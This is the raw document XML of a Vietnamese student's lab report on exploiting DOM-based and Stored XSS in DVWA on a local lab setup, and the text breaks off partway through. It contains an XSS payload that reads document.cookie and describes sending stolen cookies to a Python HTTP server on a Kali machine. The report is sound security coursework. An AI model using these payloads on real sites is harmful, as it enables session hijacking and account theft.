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88" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_oqzk2cw7xgi" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LAB 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:spacing w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2ptnp831nvhs" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Attack and Defense (tt)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:spacing w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1"/>
        <w:tblW w:w="943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4">
            <w:pPr>
              <w:spacing w:after="120" w:before="120" w:line="288" w:lineRule="auto"/>
              <w:ind w:left="720" w:firstLine="0"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Họ tên và MSSV:</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> ……Đào Ngọc Hòa - 1050080050……………</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
            <w:pPr>
              <w:spacing w:after="120" w:before="120" w:line="288" w:lineRule="auto"/>
              <w:ind w:left="720" w:firstLine="0"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Lớp:</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> ……ĐH_10_CNPM 1…………….</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
            <w:pPr>
              <w:spacing w:after="120" w:before="120" w:line="288" w:lineRule="auto"/>
              <w:ind w:left="720" w:firstLine="0"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Link youtube:</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> ……https://youtu.be/YOgx0guo9Jc………………….</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
            <w:pPr>
              <w:spacing w:after="120" w:before="120" w:line="288" w:lineRule="auto"/>
              <w:ind w:left="720" w:firstLine="0"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Link Github:</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">……………https://github.com/hoad3/BMMMT-HT………….</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Các sinh viên bị phát hiện sao chép bài của nhau sẽ nhận 0đ cho tất cả bài thực hành của môn này.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Trình bày chi tiết từng bước thực hành</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bài nộp phải ở dạng ,docx</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, hình minh họa phải rõ ràng chi tiết. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hình minh hoạ chỉ cần chụp ở nội dung thực hiện, không chụp toàn màn hình.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Quay lại quá trình làm bài, quay luôn </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">faces</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> của mình, đang làm, đẩy lên youtube, gửi link vào đây.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Link youtube tham khảo full của</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thanh Hơn 09_CNPM3: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="0000ff"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">LAB 5 9 - 5 - 2024 - YouTube</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:spacing w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="ff0000"/>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Câu 1: Khai thác lỗi Cross-site scripting (XSS) trên DVWA</w:t>
      </w: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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1. Tham khảo các tài liệu đính kèm để khai thác lỗi </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dom-based XSS </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">trên DVWA (security ở mức độ low) để lấy cookie của người dùng đang đăng nhập.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/mrudnitsky/dvwa-guide-2019/blob/master/low/Challenge%2010:%20XSS%20(DOM).md</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://bughacking.com/dvwa-ultimate-guide-first-steps-and-walkthrough/#XSS_DOM</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId9">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://youtu.be/X87Ubv-qDm4?list=PLHUKi1UlEgOJLPSFZaFKMoexpM6qhOb4Q</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(Chụp hình minh họa quá trình thực hiện)</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Mở trang DVWA và chọn XSS, nhập thanh địa chỉ như trong hình bên dưới:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6172200" cy="25527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172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đường dẫn </w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://localhost</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ta thêm vào đằng sau chuỗi </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">này</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/vulnerabilities/xss_d/?default=&lt;script&gt;alert(document.cookie)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6172200" cy="1574800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>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172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Kết quả cookie hiện lên:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6172200" cy="3162300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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72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Chạy server </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">với lệnh python -m http.server 9999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D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6172200" cy="50800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72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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="4886325" cy="1266825"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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863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Chèn script vào và chạy:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6172200" cy="10541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172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Cookie nhận được:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6115050" cy="1247775"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="25"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61150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2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tạo file có tên a.js </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3448050" cy="533400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="24"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448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Thêm những đoạn code sau vào file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5314950" cy="1657350"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="27"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3149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Lưu file và chạy python2 -m SimpleHTTPServer 9999</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6172200" cy="1066800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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172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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6172200" cy="1371600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="23"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6172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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6172200" cy="1168400"/>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172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Khi chạy với cấu hình trong file a.js là địa chỉ của máy kali (192.168.10.172) thì khi kiểm tra Request Header ta không thấy hiển thị Cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6172200" cy="1435100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="26"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6172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6172200" cy="495300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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172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4714875" cy="2286000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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7148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3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Còn khi chạy với localhost ta sẽ nhận được Cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>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t xml:space="preserve">1.2. Tham khảo các tài liệu đính kèm để khai thác lỗi </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Stored XSS </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">trên DVWA (security ở mức độ low) để lấy cookie của người dùng đang đăng nhập. Sau đó dùng công cụ Burp Suite (hoặc chức năng Inspect trên Firefox) để truy cập vào DVWA sử dụng cookie vừa lấy được.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId26">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single"/>
